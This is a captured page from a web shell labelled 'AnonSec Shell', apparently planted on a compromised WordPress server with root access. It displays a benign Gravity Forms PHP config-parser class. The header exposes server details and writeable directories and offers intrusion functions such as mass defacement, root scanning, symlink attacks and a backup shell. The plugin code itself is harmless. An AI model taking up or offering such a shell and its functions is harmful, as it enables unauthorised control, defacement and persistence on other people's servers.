AnonSec Shell
Server IP : 172.67.157.199  /  Your IP : 18.119.138.48   [ Reverse IP ]
Web Server : Apache
System : Linux b70eb322-3aee-0c53-7c82-0db91281f2c6.secureserver.net 6.1.90-1.el9.elrepo.x86_64 #1 SMP PREEMPT_DYNAMIC Thu May 2 12:09:22 EDT 2024 x86_64
User : root ( 0)
PHP Version : 8.0.30.2
Disable Function : NONE
Domains : 0 Domains
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/wp-content/plugins/gravityforms/includes/config/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/wp-content/plugins/gravityforms/includes/config/class-gf-config-data-parser.php
<?php

namespace Gravity_Forms\Gravity_Forms\Config;

/**
 * Parses a given data array to return either Live or Mock values, depending on the
 * environment and context.
 *
 * @since 2.6
 *
 * @package Gravity_Forms\Gravity_Forms\Config
 */
class GF_Config_Data_Parser {

	/**
	 * Parse the given $data array and get the correct values for the context.
	 *
	 * @since 2.6
	 *
	 * @param $data
	 *
	 * @return array
	 */
	public function parse( $data ) {
		$return = array();

		foreach( $data as $key => $value ) {
			$return[ $key ] = $this->get_correct_value( $value );
		}

		return $return;
	}

	/**
	 * Loop through each array key and get the correct value. Is called recursively for
	 * nested arrays.
	 *
	 * @since 2.6
	 *
	 * @param mixed $value
	 *
	 * @return array|mixed
	 */
	private function get_correct_value( $value ) {

		// Value isn't array - we've reached the final level for this branch.
		if ( ! is_array( $value ) ) {
			return $value;
		}

		// Value is an array with our defined value and default keys. Return either live or mock data.
		if ( array_key_exists( 'default', $value ) ) {
			return $this->is_mock() ? $value['default'] : $value['value'];
		}

		$data = array();

		// Value is an array - recursively call this method to dig into each level and return the correct value.
		foreach( $value as $key => $value ) {
			$data[ $key ] = $this->get_correct_value( $value );
		}

		return $data;
	}

	/**
	 * Determine whether the current environmental context is a Mock context.
	 *
	 * @since 2.6
	 *
	 * @return bool
	 */
	private function is_mock() {
		return defined( 'GFORMS_DOING_MOCK' ) && GFORMS_DOING_MOCK;
	}

}

Anon7 - 2022
AnonSec Team